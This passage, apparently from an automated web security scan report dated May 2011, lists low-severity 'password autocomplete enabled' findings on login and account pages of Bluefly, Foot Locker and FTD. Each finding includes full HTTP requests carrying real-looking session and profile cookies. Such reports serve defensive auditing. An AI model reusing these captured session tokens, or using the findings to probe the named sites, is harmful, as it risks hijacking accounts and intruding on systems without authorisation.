Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...



<form action="https://www.bluefly.com/myfly/login.jsp?_DARGS=/myfly/f_login.jsp.login" method="post"><input name="_dyncharset" value="ISO-8859-1" type="hidden">
...[SNIP]...



<input id="password" maxlength="40" name="password" value="" class="input" type="password"><input name="_D:password" value=" " type="hidden">
...[SNIP]...

14.26. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=AwCK-CkAAAAA6YPQTRybEAHpg9BNAQDpg9BNAAAAAAAAAADpg9BNAQA6AAAAWwQAAAI; SSSC=1.G5607126572844751644.1.58.1115; SSOD=AGHw_gAA; SSLB=1; SSRT=64PQTQE; TLTHID=7D2A76E47F5F107F24CCB1BBDF37F7B5; TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; JSESSIONID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; _714bc2c9=guest; CS_TRACKER_ID=ONzgfawlrUIPLStla7ZseA**.bluefly_node4; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; __utmb=9200358.1.10.1305510900; cmTPSet=Y; mr_referredVisitor=0; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%5D; TS18d374=f627709e7890e7b2182df7e64b5a37d2dc25568252c8426a4dd083eb; CoreAt=; cmRS=&t1=1305510900223&t2=1305510909795&t3=1305511130583&lti=1305511130581&ln=&hr=/myfly/login.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4&fti=&fn=keyword_search_0%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=core.bluefly.com/cm%3F&ci=90039438

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:01 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSRT=xYbQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:07:01 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP06 (build: SVNTag=JBPAPP_4_3_0_GA_CP06 date=200907141446)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yLERDUy1DU1IvOS4yLFNlcnZpY2UvOS4yLENBRi85LjIgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wICBd
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=2FF624847F61107F23939AFFB4D3A655; Path=/; Domain=.bluefly.com
RTSS: 1
Set-Cookie: TS18d374=abc710a5695fda7f92b304b93d86d0cedc25568252c8426a4dd086c5; Path=/
Content-Length: 67225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
</div>
<form id="myaccount_create" name="myaccount_create" action="https://www.bluefly.com/myfly/login.jsp?_DARGS=/myfly/f_registration.jsp.myaccount_create" method="post"><input name="_dyncharset" value="ISO-8859-1" type="hidden">
...[SNIP]...



<input id="newpassword" maxlength="40" name="newpassword" value="" class="input" type="password"><input name="_D:newpassword" value=" " type="hidden">
...[SNIP]...



<input id="confirmpassword" maxlength="40" name="confirmpassword" value="" class="input" type="password"><input name="_D:confirmpassword" value=" " type="hidden">
...[SNIP]...

14.27. http://www.footlocker.com/login/login_form.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /login/login_form.cfm

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login/login_form.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true&dontRunBV=true HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:33 GMT
Connection: close
Set-Cookie: SSLC=web%2D15;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:33 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:33 GMT;path=/
Content-Length: 3227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</h1>
<form action="https://www.footlocker.com/login/login_action.cfm?secured=false&bv_RR_enabled=true&bv_AA_enabled=true" method="post" target="_self">
<input type="hidden" name="co_cd" value="21" />
...[SNIP]...
</label>
<input class="text" type="password" name="login_password" id="login_password" value="" />
</div>
...[SNIP]...

14.28. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...
<div class="box">
<form class="validateOnSubmit" name="accountCreateForm" method="POST" action="https://www.footlocker.com/account/default.cfm?action=accountConfirm" onsubmit="syncStateAndZipOnSubmitAction_ma()">
               <input type="hidden" name="requestKey" id="requestKey" value="C49C97B373">
...[SNIP]...
<td><input class="validate_required" type="password" name="password" size="30" maxlength="20" value=""></td>
...[SNIP]...
<td><input class="validate_required" type="password" name="confirmPassword" size="30" maxlength="20" value=""></td>
...[SNIP]...

14.29. https://www.footlocker.com/account/default/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...
<div id="account_access" class="column box">
<form class="validateOnSubmit" name="accountSignInForm" method="POST" action="https://www.footlocker.com/account/default.cfm?action=accountSignIn">
<input type="hidden" name="companyCode" value="21">
...[SNIP]...
<br />
<input class="validate_required" size="25" type="password" name="password" value="" />
</li>
...[SNIP]...

14.30. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/528/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

14.31. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.32. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL: https://ordering.ftd.com/528/signin/ (the toolbar_signin_form form). The form contains the following password field with autocomplete enabled: password.

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
